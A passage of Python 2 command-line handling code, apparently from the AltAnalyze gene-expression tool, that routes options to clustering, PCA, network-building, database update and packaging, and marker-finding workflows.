print 'Please provide a valid file location for your input data matrix (must have an annotation row and an annotation column)';sys.exit()
row_method = 'weighted'
column_method = 'average'
row_metric = 'cosine'
column_metric = 'cosine'
color_gradient = 'red_black_sky'
contrast=2.5
vendor = 'Affymetrix'
GeneSelection = ''
PathwaySelection = ''
GeneSetSelection = 'None Selected'
rho = None
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--row_method':
row_method=arg
if row_method == 'None': row_method = None
elif opt == '--column_method':
column_method=arg
if column_method == 'None': column_method = None
elif opt == '--row_metric': row_metric=arg
elif opt == '--column_metric': column_metric=arg
elif opt == '--color_gradient': color_gradient=arg
elif opt == '--GeneSetSelection': GeneSetSelection=arg
elif opt == '--PathwaySelection': PathwaySelection=arg
elif opt == '--genes': GeneSelection=arg
elif opt == '--OntologyID': OntologyID=arg
elif opt == '--normalization': normalization=arg
elif opt == '--justShowTheseIDs': justShowTheseIDs=arg
elif opt == '--rho': rho=arg
elif opt == '--clusterGOElite':clusterGOElite=arg
elif opt == '--contrast':
try: contrast=float(arg)
except Exception: print '--contrast not a valid float';sys.exit()
elif opt == '--vendor': vendor=arg
elif opt == '--display':
if arg=='yes':
display=True
elif arg=='True':
display=True
else:
display=False
if len(GeneSetSelection)>0 or GeneSelection != '':
gsp = UI.GeneSelectionParameters(species,array_type,vendor)
gsp.setGeneSet(GeneSetSelection)
gsp.setPathwaySelect(PathwaySelection)
gsp.setGeneSelection(GeneSelection)
gsp.setOntologyID(OntologyID)
gsp.setTranspose(transpose)
gsp.setNormalize(normalization)
gsp.setJustShowTheseIDs(justShowTheseIDs)
try: gsp.setClusterGOElite(clusterGOElite)
except Exception: pass
if rho!=None:
try:
float(rho)
gsp.setRhoCutoff(rho)
except Exception: print 'Must enter a valid Pearson correlation cutoff (float)'
transpose = gsp ### this allows methods that don't transmit this object to also work
if row_method == 'no': row_method = None
if column_method == 'no': column_method = None
if len(GeneSetSelection)>0:
if species == None:
print "Please enter a valide species (--species)"; sys.exit()
try:
files = unique.read_directory(input_file_dir+'/')
dir = input_file_dir
for file in files:
filename = dir+'/'+file
UI.createHeatMap(filename, row_method, row_metric, column_method, column_metric, color_gradient, transpose, contrast, None, display=display)
except Exception:
UI.createHeatMap(input_file_dir, row_method, row_metric, column_method, column_metric, color_gradient, transpose, contrast, None, display=display)
#from visualization_scripts import clustering; clustering.outputClusters([input_file_dir],[])
sys.exit()
if 'PCA' in image_export or 't-SNE' in image_export or 'UMAP' in image_export or 'umap' in image_export:
#AltAnalyze.py --input "/Users/nsalomonis/Desktop/folds.txt" --image PCA --plotType 3D --display True --labels yes
#python AltAnalyze.py --input "/Users/nsalomonis/Desktop/log2_expression.txt" --image "t-SNE" --plotType 2D --display True --labels no --genes "ACTG2 ARHDIA KRT18 KRT8 ATP2B1 ARHGDIB" --species Hs --platform RNASeq --separateGenePlots True --zscore no
#--algorithm "t-SNE"
include_labels = 'yes'
plotType = '2D'
pca_algorithm = 'SVD'
geneSetName = None
zscore = True
colorByGene=None
separateGenePlots = False
reimportModelScores = True
maskGroups = None
if 't-SNE' in image_export:
pca_algorithm = 't-SNE'
if 'UMAP' in image_export or 'umap' in image_export:
pca_algorithm = 'UMAP'
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
#print opt,arg
if opt == '--labels':
include_labels=arg
if include_labels == 'True' or include_labels == 'yes':
include_labels = 'yes'
else:
include_labels = 'no'
if opt == '--plotType': plotType=arg
if opt == '--algorithm': pca_algorithm=arg
if opt == '--geneSetName': geneSetName=arg
if opt == '--genes': colorByGene=arg
if opt == '--maskGroups': maskGroups=arg
if opt == '--reimportModelScores':
if arg == 'yes' or arg == 'True' or arg == 'true':
reimportModelScores = True
else:
reimportModelScores = False
if opt == '--separateGenePlots':
if arg=='yes' or arg=='True' or arg == 'true':
separateGenePlots = True
else:
separateGenePlots = False
if opt == '--zscore':
if arg=='yes' or arg=='True' or arg == 'true':
zscore=True
else:
zscore=False
if opt == '--display':
if arg=='yes' or arg=='True' or arg == 'true':
display=True
if input_file_dir==None:
print 'Please provide a valid file location for your input data matrix (must have an annotation row and an annotation column)';sys.exit()
UI.performPCA(input_file_dir, include_labels, pca_algorithm, transpose, None,
plotType=plotType, display=display, geneSetName=geneSetName, species=species, zscore=zscore,
colorByGene=colorByGene, reimportModelScores=reimportModelScores, separateGenePlots=separateGenePlots,
maskGroups=maskGroups)
sys.exit()
if 'VennDiagram' in image_export:
# AltAnalyze.py --image "VennDiagram" --input "C:\file1.txt" --input "C:\file2.txt" --output "C:\graphs"
files_to_merge=[]
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--input':
arg = verifyPath(arg)
files_to_merge.append(arg)
if opt == '--display':
if arg=='yes' or arg=='True' or arg == 'true':
display=True
if len(files_to_merge)<2:
print 'Please designate two or more files to compare (--input)';sys.exit()
UI.vennDiagram(files_to_merge, output_dir, None, display=display)
sys.exit()
if 'AltExonViewer' in image_export:
#python AltAnalyze.py --image AltExonViewer --AltResultsDir "C:\CP-hESC" --genes "ANXA7 FYN TCF3 NAV2 ETS2 MYLK ATP2A2" --species Hs --platform exon --dataType "splicing-index"
genes=[]
show_introns='no'
geneFileDir=''
analysisType='plot'
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--genes':genes=arg
elif opt == '--dataType': data_type = arg
elif opt == '--showIntrons': show_introns = arg
elif opt == '--AltResultsDir': altresult_dir = arg
elif opt == '--geneFileDir': geneFileDir = arg
elif opt == '--analysisType': analysisType=arg
if altresult_dir == None:
print 'Please include the location of the AltResults directory (--AltResultsDir)'; sys.exit()
if len(genes)==0 and len(geneFileDir)==0:
print "Please indicate the genes (--genes) or gene file location (--geneFileDir) for AltExonViewer";sys.exit()
if species == None:
print "Please enter a valide species (--species)"; sys.exit()
if array_type == None:
print "Please enter a valide platform (--platform)"; sys.exit()
if 'AltResults' not in altresult_dir:
altresult_dir+='/AltResults/'
if 'Sashimi' in analysisType:
#python AltAnalyze.py --image AltExonViewer --AltResultsDir "/Users/saljh8/Desktop/Grimes/GEC14074/AltResults/" --genes "Dgat1 Dgat2 Tcf7l1" --species Mm --platform RNASeq --analysisType SashimiPlot
analysisType = 'Sashimi-Plot'
altresult_dir = string.split(altresult_dir,'AltResults')[0]
if len(geneFileDir)>0: genes = geneFileDir
geneFileDir=''
elif 'raw' in data_type: ### Switch directories if expression
altanalyze_results_folder = string.replace(altresult_dir,'AltResults','ExpressionInput')
altresult_dir = UI.getValidExpFile(altanalyze_results_folder)
if len(altresult_dir)==0:
print 'No valid expression input file (e.g., exp.MyExperiment.txt) found in',altanalyze_results_folder;sys.exit()
else:
altanalyze_results_folder = altresult_dir+'/RawSpliceData/'+species
try: altresult_dir = UI.getValidSplicingScoreFile(altanalyze_results_folder)
except Exception,e:
print "No files found in: "+altanalyze_results_folder; sys.exit()
if len(geneFileDir)>0:
try:
genes = UI.importGeneList(geneFileDir) ### list of gene IDs or symbols
except Exception:
### Can occur if a directory of files is selected
try:
files = unique.read_directory(geneFileDir+'/')
gene_string=''
for file in files:
if '.txt' in file:
filename = geneFileDir+'/'+file
genes = UI.importGeneList(filename) ### list of gene IDs or symbols
gene_string = gene_string+','+genes
print 'Imported genes from',file,'\n'
#print [altresult_dir];sys.exit()
UI.altExonViewer(species,platform,altresult_dir, gene_string, show_introns, analysisType, False)
except Exception: pass
sys.exit()
if len(genes)==0:
print 'Please list one or more genes (--genes "ANXA7 FYN TCF3 NAV2 ETS2 MYLK ATP2A2")'; sys.exit()
try: UI.altExonViewer(species,platform,altresult_dir, genes, show_introns, analysisType, False)
except Exception:
print traceback.format_exc()
sys.exit()
if 'network' in image_export:
#AltAnalyze.py --image network --species Hs --output "C:\GSE9440_RAW" --PathwaySelection Apoptosis:WP254 --GeneSetSelection WikiPathways
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--update_interactions': update_interactions=arg
elif opt == '--includeExpIDs': includeExpIDs=arg
elif opt == '--degrees': degrees=arg
elif opt == '--genes':
Genes=arg
inputType = 'IDs'
elif opt == '--inputType': inputType=arg
elif opt == '--interactionDirs': interactionDirs.append(arg)
elif opt == '--GeneSetSelection': GeneSetSelection=arg
elif opt == '--PathwaySelection': PathwaySelection=arg
elif opt == '--OntologyID': OntologyID=arg
elif opt == '--display': display=arg
if update_interactions == 'yes': update_interactions = True
else: update_interactions = False
if input_file_dir == None: pass
elif len(input_file_dir) == 0: input_file_dir = None
if len(input_exp_file) == 0: input_exp_file = None
if len(interactionDirs) == 0: interactionDirs=['WikiPathways']
if interactionDirs == ['all']:
interactionDirs = ['WikiPathways','KEGG','BioGRID','TFTargets','common-microRNATargets','all-microRNATargets','common-DrugBank','all-DrugBank']
if interactionDirs == ['main']:
interactionDirs = ['WikiPathways','KEGG','BioGRID','TFTargets']
if interactionDirs == ['confident']:
interactionDirs = ['WikiPathways','KEGG','TFTargets']
if len(Genes) == 0: Genes = None
if output_dir == None: pass
elif len(output_dir) == 0: output_dir = None
if len(GeneSetSelection) == 'None Selected': GeneSetSelection = None
if includeExpIDs=='yes': includeExpIDs = True
else: includeExpIDs = False
gsp = UI.GeneSelectionParameters(species,array_type,manufacturer)
gsp.setGeneSet(GeneSetSelection)
gsp.setPathwaySelect(PathwaySelection)
gsp.setGeneSelection(Genes)
gsp.setOntologyID(OntologyID)
gsp.setIncludeExpIDs(includeExpIDs)
root = ''
if species == None:
print 'Please designate a species (--species).'; sys.exit()
if output_dir == None:
print 'Please designate an ouput directory (--output)'; sys.exit()
if input_file_dir !=None:
if '.txt' in input_file_dir or '.sif' in input_file_dir:
UI.networkBuilder(input_file_dir,inputType,output_dir,interactionDirs,degrees,input_exp_file,gsp,root)
else:
parent_dir = input_file_dir
dir_list = read_directory(parent_dir)
for file in dir_list:
input_file_dir = parent_dir+'/'+file
try:
UI.networkBuilder(input_file_dir,inputType,output_dir,interactionDirs,degrees,input_exp_file,gsp,root)
except Exception:
print file, 'failed to produce network'
else:
UI.networkBuilder(None,inputType,output_dir,interactionDirs,degrees,input_exp_file,gsp,root)
sys.exit()
########## Begin database dependent AltAnalyze workflows
if ensembl_version != 'current' and 'markers' not in update_method:
dbversion = string.replace(ensembl_version,'EnsMart','')
UI.exportDBversion('EnsMart'+dbversion)
gene_database = unique.getCurrentGeneDatabaseVersion()
print 'Current database version:',gene_database
if array_type == None and update_dbs != 'yes' and denom_file_dir == None:
print "Please specify an array or data type (e.g., RNASeq, exon, gene, junction, AltMouse, 3'array)."; sys.exit()
if 'archive' in update_method:
###
print 'Archiving databases', ensembl_version
try: archive_dir = 'ArchiveDBs/EnsMart'+ensembl_version+'/archive'; export.createDirPath(filepath(archive_dir))
except Exception: null = [] ### directory already exists
dirs = unique.read_directory('/ArchiveDBs/EnsMart'+ensembl_version)
print len(dirs), dirs
import shutil
for species_dir in dirs:
try:
#print '/ArchiveDBs/EnsMart'+ensembl_version+'/'+species_dir+'/'+species_dir+'_RNASeq.zip'
src = filepath('ArchiveDBs/EnsMart'+ensembl_version+'/'+species_dir+'/'+species_dir+'_RNASeq.zip')
dstn = filepath('ArchiveDBs/EnsMart'+ensembl_version+'/archive/'+species_dir+'_RNASeq.zip')
#export.copyFile(src, dstn)
shutil.move(src, dstn)
try:
srcj = string.replace(src,'RNASeq.','junction.'); dstnj = string.replace(dstn,'RNASeq.','junction.')
shutil.move(srcj, dstnj)
except Exception: null=[]
try:
src = string.replace(src,'_RNASeq.','.'); dstn = string.replace(dstn,'_RNASeq.','.')
shutil.move(src, dstn)
except Exception:
print traceback.format_exc()
pass
except Exception:
print traceback.format_exc()
pass
sys.exit()
if update_dbs == 'yes' and 'Official' not in update_method:
if 'cleanup' in update_method:
existing_species_dirs = unique.read_directory('/AltDatabase/ensembl')
print 'Deleting EnsemblSQL directory for all species, ensembl version',ensembl_version
for species in existing_species_dirs:
export.deleteFolder('AltDatabase/ensembl/'+species+'/EnsemblSQL')
existing_species_dirs = unique.read_directory('/AltDatabase')
print 'Deleting SequenceData directory for all species, ensembl version',ensembl_version
for species in existing_species_dirs:
export.deleteFolder('AltDatabase/'+species+'/SequenceData')
print 'Finished...exiting'
sys.exit()
if 'package' not in update_method and 'markers' not in update_method:
### Example:
### python AltAnalyze.py --species all --arraytype all --update all --version 60
### tr -d \\r < AltAnalyze.py > AltAnalyze_new.py
### chmod +x AltAnalyze_new.py
### nohup ./AltAnalyze.py --update all --species Mm --arraytype gene --arraytype exon --version 60 2>&1 > nohup_v60_Mm.txt
if array_type == 'all' and (species == 'Mm' or species == 'all'): array_type = ['AltMouse','exon','gene','junction','RNASeq']
elif array_type == 'all' and (species == 'Hs' or species == 'Rn'): array_type = ['exon','gene','junction','RNASeq']
else: array_type = [array_type]+additional_array_types
if species == 'all' and 'RNASeq' not in array_type: species = selected_species ### just analyze the species for which multiple platforms are supported
if species == 'selected': species = selected_species ### just analyze the species for which multiple platforms are supported
elif species == 'all':
all_supported_names = {}; all_species_names={}
species_names = UI.getSpeciesInfo()
for species in species_names: all_supported_names[species_names[species]]=species
from build_scripts import EnsemblSQL
child_dirs, ensembl_species, ensembl_versions = EnsemblSQL.getCurrentEnsemblSpecies('release-'+ensembl_version)
for ens_species in ensembl_species:
ens_species = string.replace(ens_species,'_',' ')
if ens_species in all_supported_names:
all_species_names[all_supported_names[ens_species]]=[]
del all_species_names['Hs']
del all_species_names['Mm']
del all_species_names['Rn']
"""
del all_species_names['Go']
del all_species_names['Bt']
del all_species_names['Sc']
del all_species_names['Ss']
del all_species_names['Pv']
del all_species_names['Pt']
del all_species_names['La']
del all_species_names['Tt']
del all_species_names['Tr']
del all_species_names['Ts']
del all_species_names['Pb']
del all_species_names['Pc']
del all_species_names['Ec']
del all_species_names['Tb']
del all_species_names['Tg']
del all_species_names['Dn']
del all_species_names['Do']
del all_species_names['Tn']
del all_species_names['Dm']
del all_species_names['Oc']
del all_species_names['Og']
del all_species_names['Fc']
del all_species_names['Dr']
del all_species_names['Me']
del all_species_names['Cp']
del all_species_names['Tt']
del all_species_names['La']
del all_species_names['Tr']
del all_species_names['Ts']
del all_species_names['Et'] ### No alternative isoforms?
del all_species_names['Pc']
del all_species_names['Tb']
del all_species_names['Fc']
del all_species_names['Sc']
del all_species_names['Do']
del all_species_names['Dn']
del all_species_names['Og']
del all_species_names['Ga']
del all_species_names['Me']
del all_species_names['Ml']
del all_species_names['Mi']
del all_species_names['St']
del all_species_names['Sa']
del all_species_names['Cs']
del all_species_names['Vp']
del all_species_names['Ch']
del all_species_names['Ee']
del all_species_names['Ac']"""
sx=[]; all_species_names2=[] ### Ensure that the core selected species are run first
for species in selected_species:
if species in all_species_names: sx.append(species)
for species in all_species_names:
if species not in selected_species: all_species_names2.append(species)
all_species_names = sx+all_species_names2
species = all_species_names
else: species = [species]
update_uniprot='no'; update_ensembl='no'; update_probeset_to_ensembl='no'; update_domain='no'; update_miRs = 'no'; genomic_build = 'new'; update_miR_seq = 'yes'
if 'all' in update_method:
update_uniprot='yes'; update_ensembl='yes'; update_probeset_to_ensembl='yes'; update_domain='yes'; update_miRs = 'yes'
if 'UniProt' in update_method: update_uniprot = 'yes'
if 'Ensembl' in update_method: update_ensembl = 'yes'
if 'Probeset' in update_method or 'ExonAnnotations' in update_method: update_probeset_to_ensembl = 'yes'
if 'Domain' in update_method:
update_domain = 'yes'
try: from Bio import Entrez #test this
except Exception: print 'The dependent module Bio is not installed or not accessible through the default python interpretter. Existing AltAnalyze.'; sys.exit()
if 'miRBs' in update_method or 'miRBS' in update_method: update_miRs = 'yes'
if 'NewGenomeBuild' in update_method: genomic_build = 'new'
if 'current' in ensembl_version: print "Please specify an Ensembl version number (e.g., 60) before proceeding with the update.";sys.exit()
try: force = force ### Variable is not declared otherwise
except Exception: force = 'yes'; print 'force:',force
existing_species_dirs={}
update_all = 'no' ### We don't pass this as yes, in order to skip certain steps when multiple array types are analyzed (others are specified above)
try: print "Updating AltDatabase the following array_types",string.join(array_type),"for the species",string.join(species)
except Exception: print 'Please designate a valid platform/array_type (e.g., exon) and species code (e.g., Mm).'
for specific_species in species:
for platform_name in array_type:
if platform_name == 'AltMouse' and specific_species == 'Mm': proceed = 'yes'
elif platform_name == 'exon' or platform_name == 'gene':
from build_scripts import ExonArrayEnsemblRules
#### Check to see if the probeset.csv file is present
#try: probeset_transcript_file = ExonArrayEnsemblRules.getDirectoryFiles('/AltDatabase/'+specific_species+'/'+platform_name)
#except Exception: print "Affymetrix probeset.csv anotation file is not found. You must save this to",'/AltDatabase/'+specific_species+'/'+platform_name,'before updating (unzipped).'; sys.exit()
proceed = 'yes'
elif platform_name == 'junction' and (specific_species == 'Hs' or specific_species == 'Mm'): proceed = 'yes'
elif platform_name == 'RNASeq': proceed = 'yes'
else: proceed = 'no'
if proceed == 'yes':
print "Analyzing", specific_species, platform_name
if (platform_name != array_type[0]) and len(species)==1:
update_uniprot = 'no'; update_ensembl = 'no'; update_miR_seq = 'no' ### Don't need to do this twice in a row
print 'Skipping ensembl, uniprot and mir-sequence file import updates since already completed for this species',array_type,platform_name
if ignore_built_species == 'yes': ### Useful for when building all species for a new database build
try:
### call this here to update with every species - if running multiple instances
existing_species_dirs = unique.read_directory('/AltDatabase/ensembl')
except Exception: #ZeroDivisionError
try: os.mkdir(unique.filepath('AltDatabase/'))
except Exception: pass #already exists
existing_species_dirs = []
if specific_array_type != None and specific_array_type != platform_name: platform_name+='|'+specific_array_type ### For the hGlue vs. JAY arrays
if specific_species not in existing_species_dirs: ### Useful when running multiple instances of AltAnalyze to build all species
print 'update_ensembl',update_ensembl
print 'update_uniprot',update_uniprot
print 'update_probeset_to_ensembl',update_probeset_to_ensembl
print 'update_domain',update_domain
print 'update_miRs',update_miRs
update.executeParameters(specific_species,platform_name,force,genomic_build,update_uniprot,update_ensembl,update_probeset_to_ensembl,update_domain,update_miRs,update_all,update_miR_seq,ensembl_version)
else: print 'ignoring',specific_species
sys.exit()
if 'package' in update_method:
### Example: python AltAnalyze.py --update package --species all --platform all --version 65
if ensembl_version == 'current': print '\nPlease specify version of the database to package (e.g., --version 60).'; sys.exit()
ensembl_version = 'EnsMart'+ensembl_version
### Get all possible species
species_names = UI.getSpeciesInfo(); possible_species={}
possible_species = species_names
possible_arrays = ['exon','gene','junction','AltMouse','RNASeq']
try:
if species == 'all': possible_species = possible_species
elif species == 'selected': possible_species = selected_species
else: possible_species = [species]
except Exception: species = possible_species
if array_type == None or array_type == 'all': possible_arrays = possible_arrays
else: possible_arrays = [array_type]+additional_array_types
species_to_package={}
dirs = unique.read_directory('/AltDatabase/'+ensembl_version)
#print possible_arrays, possible_species; sys.exit()
for species_code in dirs:
if species_code in possible_species:
array_types = unique.read_directory('/AltDatabase/'+ensembl_version+'/'+species_code)
for arraytype in array_types:
if arraytype in possible_arrays:
if species_code in possible_species:
array_types = unique.read_directory('/AltDatabase/'+ensembl_version+'/'+species_code)
try: species_to_package[species_code].append(arraytype)
except Exception: species_to_package[species_code] = [arraytype]
species_to_package = eliminate_redundant_dict_values(species_to_package)
for species in species_to_package:
files_to_copy =[species+'_Ensembl_domain_aligning_probesets.txt']
files_to_copy+=[species+'_Ensembl_indirect_domain_aligning_probesets.txt']
files_to_copy+=[species+'_Ensembl_probesets.txt']
files_to_copy+=[species+'_Ensembl_exons.txt']
#files_to_copy+=[species+'_Ensembl_junctions.txt']
files_to_copy+=[species+'_exon_core.mps']
files_to_copy+=[species+'_exon_extended.mps']
files_to_copy+=[species+'_exon_full.mps']
files_to_copy+=[species+'_gene_core.mps']
files_to_copy+=[species+'_gene_extended.mps']
files_to_copy+=[species+'_gene_full.mps']
files_to_copy+=[species+'_gene-exon_probesets.txt']
files_to_copy+=[species+'_probes_to_remove.txt']
files_to_copy+=[species+'_probeset-probes.txt']
files_to_copy+=[species+'_probeset_microRNAs_any.txt']
files_to_copy+=[species+'_probeset_microRNAs_multiple.txt']
files_to_copy+=['probeset-domain-annotations-exoncomp.txt']
files_to_copy+=['probeset-protein-annotations-exoncomp.txt']
#files_to_copy+=['probeset-protein-dbase_exoncomp.txt']
files_to_copy+=['SEQUENCE-protein-dbase_exoncomp.txt']
files_to_copy+=[species+'_Ensembl_junction_probesets.txt']
files_to_copy+=[species+'_Ensembl_AltMouse_probesets.txt']
files_to_copy+=[species+'_RNASeq-exon_probesets.txt']
files_to_copy+=[species+'_junction-exon_probesets.txt']
files_to_copy+=[species+'_junction_all.mps']
files_to_copy+=['platform.txt'] ### Indicates the specific platform for an array type (e.g., HJAY for junction or hGlue for junction)
files_to_copy+=[species+'_junction_comps_updated.txt']
files_to_copy+=['MASTER-probeset-transcript.txt']
files_to_copy+=['AltMouse-Ensembl.txt']
files_to_copy+=['AltMouse_junction-comparisons.txt']
files_to_copy+=['AltMouse_gene_annotations.txt']
files_to_copy+=['AltMouse_annotations.txt']
common_to_copy =['uniprot/'+species+'/custom_annotations.txt']
common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl-annotations_simple.txt']
common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl-annotations.txt']
common_to_copy+=['ensembl/'+species+'/'+species+'_microRNA-Ensembl.txt']
common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl_transcript-biotypes.txt']
common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl_transcript-annotations.txt']
common_to_copy+= searchDirectory("AltDatabase/ensembl/"+species+"/",'Ensembl_Protein')
common_to_copy+= searchDirectory("AltDatabase/ensembl/"+species+"/",'ProteinFeatures')
common_to_copy+= searchDirectory("AltDatabase/ensembl/"+species+"/",'ProteinCoordinates')
common_to_copy+= searchDirectory("AltDatabase/uniprot/"+species+"/",'FeatureCoordinate')
supported_arrays_present = 'no'
for arraytype in selected_platforms:
if arraytype in species_to_package[species]: supported_arrays_present = 'yes' #Hence a non-RNASeq platform is present
if supported_arrays_present == 'yes':
for file in common_to_copy:
ir = 'AltDatabase/'+ensembl_version+'/'
er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version+'/'
export.copyFile(ir+file, er+file)
if 'RNASeq' in species_to_package[species]:
common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl_junction.txt']
common_to_copy+=['ensembl/'+species+'/'+species+'_Ensembl_exon.txt']
for file in common_to_copy:
ir = 'AltDatabase/'+ensembl_version+'/'
er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version+'/'
if species in selected_species:
er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/RNASeq/'+ensembl_version+'/' ### This allows us to build the package archive in a separate directory for selected species, so separate but overlapping content can be packaged
export.copyFile(ir+file, er+file)
for array_type in species_to_package[species]:
ir = 'AltDatabase/'+ensembl_version+'/'+species+'/'+array_type+'/'
er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version+'/'+species+'/'+array_type+'/'
if array_type == 'junction':
er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+array_type+'/'
if array_type == 'RNASeq' and species in selected_species:
er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/RNASeq/'+ensembl_version+'/'+species+'/'+array_type+'/'
for file in files_to_copy:
if array_type == 'RNASeq': file=string.replace(file,'_updated.txt','.txt')
filt_file = string.replace(file ,'.txt','-filtered.txt')
try: export.copyFile(ir+filt_file, er+filt_file); export_path = er+filt_file
except Exception:
try: export.copyFile(ir+file, er+file); export_path = er+file
except Exception: null = [] ### File not found in directory
if len(export_path)>0:
if 'AltMouse' in export_path or 'probes_' in export_path:
export.cleanFile(export_path)
if array_type == 'junction':
subdir = '/exon/'
ir = 'AltDatabase/'+ensembl_version+'/'+species+'/'+array_type+subdir
er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+array_type+subdir
for file in files_to_copy:
export_path=[]
filt_file = string.replace(file ,'.txt','-filtered.txt')
try: export.copyFile(ir+filt_file, er+filt_file); export_path = er+filt_file
except Exception:
try: export.copyFile(ir+file, er+file); export_path = er+file
except Exception: null = [] ### File not found in directory
if array_type == 'RNASeq':
subdir = '/junction/'
ir = 'AltDatabase/'+ensembl_version+'/'+species+'/'+array_type+subdir
er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version+'/'+species+'/'+array_type+subdir
if species in selected_species:
er = 'ArchiveDBs/'+ensembl_version+'/'+species+'/RNASeq/'+ensembl_version+'/'+species+'/'+array_type+subdir
for file in files_to_copy:
if 'SEQUENCE-protein-dbase' not in file and 'domain_aligning' not in file: ### This data is now combined into the main file
export_path=[]
filt_file = string.replace(file ,'.txt','-filtered.txt')
try: export.copyFile(ir+filt_file, er+filt_file); export_path = er+filt_file
except Exception:
try: export.copyFile(ir+file, er+file); export_path = er+file
except Exception: null = [] ### File not found in directory
if 'RNASeq' in species_to_package[species]:
src = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version
dst = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+species+'_RNASeq.zip'
if species in selected_species:
src = 'ArchiveDBs/'+ensembl_version+'/'+species+'/RNASeq/'+ensembl_version
update.zipDirectory(src); print 'Zipping',species, array_type, dst
os.rename(src+'.zip', dst)
if supported_arrays_present == 'yes':
src = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+ensembl_version
dst = 'ArchiveDBs/'+ensembl_version+'/'+species+'/'+species+'.zip'
update.zipDirectory(src); print 'Zipping',species, array_type, dst
os.rename(src+'.zip', dst)
if 'junction' in species_to_package[species]:
src = 'ArchiveDBs/'+ensembl_version+'/'+species+'/junction'
dst = string.replace(src,'junction',species+'_junction.zip')
update.zipDirectory(src); print 'Zipping',species+'_junction'
os.rename(src+'.zip', dst)
sys.exit()
if 'markers' in update_method:
if species == None or platform == None:
print "WARNING! A species and platform (e.g., exon, junction, 3'array or RNASeq) must be defined to identify markers.";sys.exit()
elif input_exp_file == '':
print "WARNING! A input expression file must be supplied (e.g., ExpressionOutput/DATASET.YourExperimentName.txt) for this analysis.";sys.exit()
else:
#python AltAnalyze.py --update markers --platform gene --expdir "/home/socr/c/users2/salomoni/other/boxer/normalization/Mm_Gene-TissueAtlas/ExpressionInput/exp.meta.txt"
#python AltAnalyze.py --update markers --platform gene --expdir "/home/socr/c/users2/salomoni/other/boxer/normalization/Mm_Gene-TissueAtlas/AltResults/RawSpliceData/Mm/splicing-index/meta.txt"
#python AltAnalyze.py --update markers --platform "3'array" --expdir "/home/socr/c/users2/salomoni/other/boxer/normalization/U133/ExpressionOutput/DATASET-meta.txt"
#python AltAnalyze.py --update markers --compendiumType ncRNA --platform "exon" --expdir "/home/socr/c/users2/salomoni/conklin/nsalomonis/normalization/Hs_Exon-TissueAtlas/ExpressionOutput/DATASET-meta.txt"
#python AltAnalyze.py --update markers --platform RNASeq --species Mm --geneRPKM 1 --expdir /Users/saljh8/Desktop/Grimes/MergedRSEM/DN-Analysis/ExpressionInput/exp.DN.txt --genesToReport 200
"""The markerFinder module:
1) takes an input ExpressionOutput file (DATASET.YourExperimentName.txt)
2) extracts group average expression and saves to AVERAGE.YourExperimentName.txt to the ExpressionOutput directory
3) re-imports AVERAGE.YourExperimentName.txt
4) correlates the average expression of each gene to an idealized profile to derive a Pearson correlation coefficient
5) identifies optimal markers based on these correlations for each tissue
6) exports an expression file with just these marker genes and tissues
This module can peform these analyses on protein coding or ncRNAs and can segregate the cell/tissue groups into clusters
when a group notation is present in the sample name (e.g., 0~Heart, 0~Brain, 1~Stem Cell)"""
import markerFinder
if 'AltResults' in input_exp_file and 'Clustering' not in input_exp_file:
### This applies to a file compoosed of exon-level normalized intensities (calculae average group expression)
markerFinder.getAverageExonExpression(species,platform,input_exp_file)
if 'Raw' in input_exp_file:
group_exp_file = string.replace(input_exp_file,'Raw','AVERAGE')
else:
group_exp_file = string.replace(input_exp_file,'FullDatasets','AVERAGE-FullDatasets')
altexon_correlation_file = markerFinder.analyzeData(group_exp_file,species,platform,compendiumType,geneToReport=genesToReport,correlateAll=correlateAll,AdditionalParameters=fl)
markerFinder.getExprValsForNICorrelations(platform,altexon_correlation_file,group_exp_file)
else:
### This applies to an ExpressionOutput DATASET file compoosed of gene expression values (averages already present)
import collections
try: test_ordereddict=collections.OrderedDict()
except Exception:
try: import ordereddict
except Exception:
### This is needed to re-order the average file so that the groups are sequentially ordered when analyzing clustered groups (0~)
print 'Warning!!!! To run markerFinder correctly call python version 2.7x or greater (python 3.x not supported)'
print 'Requires ordereddict (also can install the library ordereddict). To call 2.7: /usr/bin/python2.7'
sys.exit()
try:
output_dir = markerFinder.getAverageExpressionValues(input_exp_file,platform) ### Either way, make an average annotated file from the DATASET file
if 'DATASET' in input_exp_file:
group_exp_file = string.replace(input_exp_file,'DATASET','AVERAGE')
else:
group_exp_file = (input_exp_file,output_dir) ### still analyze the primary sample
except Exception:
#print traceback.format_exc()
print 'No DATASET file present (used to obtain gene annotations)...'
### Work around when performing this analysis on an alternative exon input cluster file
group_exp_file = input_exp_file
fl = UI.ExpressionFileLocationData(input_exp_file,'','',''); fl.setOutputDir(export.findParentDir(export.findParentDir(input_exp_file)[:-1]))
try: fl.setSpecies(species); fl.setVendor(vendor)
except Exception: pass
try:
rpkm_threshold = float(rpkm_threshold) ### If supplied, for any platform, use it
fl.setRPKMThreshold(rpkm_threshold)
except Exception: pass
if platform=='RNASeq':
try: rpkm_threshold = float(rpkm_threshold)
except Exception: rpkm_threshold = 1.0
fl.setRPKMThreshold(rpkm_threshold)
try: correlationDirection = direction ### correlate to a positive or inverse negative in silico artificial pattern
except Exception: correlationDirection = 'up'
fl.setCorrelationDirection(correlationDirection)
if expression_data_format == 'non-log': logTransform = True
else: logTransform = False
if 'topSplice' in input_exp_file:
markerFinder.filterRNASeqSpliceEvents(species,platform,fl,input_exp_file)
sys.exit()
